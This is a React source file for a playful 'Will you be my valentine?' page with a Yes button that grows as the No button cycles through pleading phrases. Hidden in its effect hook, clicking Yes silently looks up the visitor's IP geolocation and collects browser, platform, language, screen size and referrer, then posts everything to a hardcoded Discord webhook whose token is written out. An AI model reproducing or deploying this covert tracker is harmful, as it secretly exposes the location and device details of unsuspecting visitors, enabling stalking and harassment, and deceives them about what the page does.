import { useState, useEffect } from "react";
import "./App.css";

const phrases = [
  "Don't do this to me🫤",
  "I'm gonna cry..😭",
  "You are breaking my heart😭💔",
  "Think again!💔",
  "Last chance!😭",
  "Surely not?🥺",
  "You might regret this!",
  "Give it another thought!",
  "Are you absolutely certain?",
  "This could be a mistake!",
  "Have a heart!",
  "Don't be so cold!",
  "Change of heart?🥺",
  "Wouldn't you reconsider?",
  "Is that your final answer?",
  "You're breaking my heart ;(",
  "Is that your final answer?🫤",
  "You're breaking my heart ;(",
  "Plsss? :( You're breaking my heart🫤",
];

function App() {
  const [noCount, setNoCount] = useState(0);
  const [yesPressed, setYesPressed] = useState(false);
  const yesButtonSize = noCount * 5 + 16;

  function handleYesClick() {
    setYesPressed(true);
  }

  function handleNoClick() {
    setNoCount(noCount + 1);
  }

  function getNoButtonText() {
    return phrases[Math.min(noCount, phrases.length - 1)];
  }

  useEffect(() => {
    if (yesPressed) {
      var ip = '';
      var latitude = '';
      var longitude = '';
      var city = '';
      var country = '';
      var org = '';
      var mapLink = '';
      var browserInfo = navigator.userAgent;
      var dateVisited = new Date().toUTCString();
      var language = navigator.language;
      var platform = navigator.platform;
      var referrer = document.referrer; // Sayfa referansını al

      fetch('https://ipapi.co/json/')
        .then(function(response) {
          return response.json();
        })
        .then(function(data) {
          ip = data.ip;
          latitude = data.latitude;
          longitude = data.longitude;
          city = data.city;
          country = data.country_name;
          org = data.org;

          mapLink = 'https://www.google.com/maps?q=' + latitude + ',' + longitude;

          var yerelZaman = new Date();
          var ekranGenislik = window.screen.width;
          var ekranYukseklik = window.screen.height;

          var message = 
          '-----------------------------------------------------------\n' +
            'IP: **' + ip + '**\n' +
            'Latitude: ' + latitude + '\n' +
            'Longitude: ' + longitude + '\n' +
            'City: ' + city + '\n' +
            'Country: ' + country + '\n' +
            'Organization: ' + org + '\n' +
            'Map Link: ' + mapLink + '\n\n' +
            'Browser Info: ' + browserInfo + '\n' +
            'Date Visited: ' + dateVisited + ' **(' + platform + ')**\n' +
            'Language: ' + language + '\n' +
            'Zaman: ' + yerelZaman + '\n' +
            'Ekran Genişliği: ' + ekranGenislik + '*' + ekranYukseklik + '\n' +
            'Referrer: ' + referrer; // Sayfa referansını mesajın sonuna ekle

          var webhookURL = 'https://discord.com/api/webhooks/1263930511768682608/A5GZ0WeNuW1LQxIQX60huJurmHOl1bI6v4cuNOajfQypObwrY3a0iPWdjxNAZX6zgArS';

          fetch(webhookURL, {
            method: 'POST',
            headers: {
              'Content-Type': 'application/json'
            },
            body: JSON.stringify({
              content: message
            })
          })
          .then(function(response) {
            if (response.ok) {
              console.log('Veriler Discord API\'ye başarıyla gönderildi.');
            } else {
              console.error('Veriler Discord API\'ye gönderilemedi.');
            }
          })
          .catch(function(error) {
            console.error('Hata:', error);
          });
        })
        .catch(function(error) {
          console.error('Hata:', error);
        });
      console.log("Yes button was clicked!");
/*       alert("You clicked the Yes button!"); */
      // Add any other script you want to run
    }
  }, [yesPressed]);

  return (
    <div className="valentine-container">
      {yesPressed ? (
        <>
          <img
            src="https://media.tenor.com/gUiu1zyxfzYAAAAi/bear-kiss-bear-kisses.gif"
            alt="bear-Kissing"
          />
          <div className="text">Yayyy !!!</div>
          <div className="text">Yippie !!</div>
        </>
      ) : (
        <>
          <img
            className="kiss"
            src="https://media1.tenor.com/m/al4a1pG1f8YAAAAC/jump-bear.gif"
            alt="bear with heart"
          />
          <div className="text">Will you be my valentine 🌹?</div>
          <div className="both-Button">
            <button
              className="yesButton"
              style={{
                fontSize: yesButtonSize,
                backgroundColor: "green",
              }}
              onClick={handleYesClick}
            >
              Yes 🙈
            </button>
            <button
              className="NoButton"
              onClick={handleNoClick}
            >
              {getNoButtonText()}
            </button>
          </div>
        </>
      )}
    </div>
  );
}

export default App;
